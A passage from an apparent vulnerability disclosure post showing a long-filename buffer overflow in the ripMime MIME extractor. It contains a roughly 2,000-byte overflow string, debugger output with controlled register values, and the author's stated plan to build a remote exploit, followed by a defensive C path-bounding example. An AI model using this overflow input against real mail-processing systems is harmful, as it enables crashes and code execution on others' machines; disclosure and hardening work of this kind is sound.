AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.
Program received signal SIGILL, Illegal instruction.
0x4141415c in ?? ()

One more A and we have a full eip overwrite. 2079 chars total overwrites the eip.

We smashed a lot of stuff on the way.

r0             0x4141415f       1094795615
r19            0x41414141       1094795585
r20            0x41414141       1094795585
r21            0x41414141       1094795585
r22            0x41414141       1094795585
r23            0x41414141       1094795585
r24            0x41414141       1094795585
r25            0x41414141       1094795585
r26            0x41414141       1094795585
r27            0x41414141       1094795585
r28            0x41414141       1094795585
r29            0x41414141       1094795585
r30            0x41414141       1094795585
r31            0x41414141       1094795585
pc             0x4141415c       1094795612
lr             0x4141415f       1094795615

I need to investigate methods of changing defaultdir besides the command line -d option to take advantage of this one. But of course there are also several other overflows to play with. Once I perfect the remote stuff I will mail out another update. I just didn't want to get caught sleeping again like I did on namazu.cgi. Oh yeah, this is NOT limited to BASE64 encoded files... have fun.

-KF
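Added example, not from the post above and not ripMime's own code: a bounded output-path builder in C showing the class of check the v1.2.7 changelog describes for "exceptionally long file names". The buffer limits OUTPATH_MAX and NAME_MAX_LEN and the function names are assumptions; the constructed inputs mirror the post's 79-byte -d directory and 2000-byte attachment filename.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limits for this example; ripMime's real buffer sizes are not on the page. */
#define OUTPATH_MAX 1024   /* output path buffer, including the terminating NUL */
#define NAME_MAX_LEN 255   /* longest attachment filename we are willing to accept */

enum { PATH_OK = 0, PATH_BAD_NAME = -1, PATH_TOO_LONG = -2 };

/*
 * Build "<dir>/<name>" into out[outsz] without ever writing past the buffer.
 * A MIME filename is attacker-controlled, so it is rejected if it is empty,
 * longer than NAME_MAX_LEN, or contains '/' (which would let it escape the
 * extraction directory). If dir plus name does not fit, refuse rather than
 * truncate: a silently shortened path names a different file.
 */
int build_output_path(char *out, size_t outsz, const char *dir, const char *name)
{
    size_t nlen = strlen(name);
    int n;
    if (nlen == 0 || nlen > NAME_MAX_LEN || strchr(name, '/') != NULL)
        return PATH_BAD_NAME;
    /* snprintf bounds the write; a return value >= outsz means truncation. */
    n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return PATH_TOO_LONG;
    }
    return PATH_OK;
}

/* Constructed input mirroring the post: a 79-byte -d directory and a
   2000-byte attachment filename. Expected result: PATH_BAD_NAME. */
int demo_long_filename(void)
{
    static char dir[80], name[2001], out[OUTPATH_MAX];
    memset(dir, 'A', 79);    dir[79] = '\0';
    memset(name, 'A', 2000); name[2000] = '\0';
    return build_output_path(out, sizeof out, dir, name);
}

/* Constructed input: a 900-byte directory with a legal 200-byte name still
   overruns a 1024-byte path buffer. Expected result: PATH_TOO_LONG. */
int demo_long_directory(void)
{
    static char dir[901], name[201], out[OUTPATH_MAX];
    memset(dir, 'A', 900);  dir[900] = '\0';
    memset(name, 'B', 200); name[200] = '\0';
    return build_output_path(out, sizeof out, dir, name);
}
```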


